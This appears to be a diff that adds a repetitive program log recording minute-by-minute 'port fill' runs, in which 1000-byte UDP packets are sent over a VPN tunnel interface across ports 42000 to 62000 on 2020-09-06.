+Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:00:04 +Starting port fill at 2020-09-06 07:01:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:01:05 +Starting port fill at 2020-09-06 07:02:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:02:05 +Starting port fill at 2020-09-06 07:03:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:03:04 +Starting port fill at 2020-09-06 07:04:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:04:04 +Starting port fill at 2020-09-06 07:05:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:05:05 +Starting port fill at 2020-09-06 07:06:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:06:04 +Starting port fill at 2020-09-06 07:07:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:07:04 +Starting port fill at 2020-09-06 07:08:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:08:06 +Starting port fill at 2020-09-06 07:09:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:09:05 +Starting port fill at 2020-09-06 07:10:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:10:06 +Starting port fill at 2020-09-06 07:11:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:11:05 +Starting port fill at 2020-09-06 07:12:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:12:05 +Starting port fill at 2020-09-06 07:13:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:13:05 +Starting port fill at 2020-09-06 07:14:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:14:05 +Starting port fill at 2020-09-06 07:15:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:15:05 +Starting port fill at 2020-09-06 07:16:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:16:05 +Starting port fill at 2020-09-06 07:17:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:17:05 +Starting port fill at 2020-09-06 07:18:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:18:07 +Starting port fill at 2020-09-06 07:19:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:19:04 +Starting port fill at 2020-09-06 07:20:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 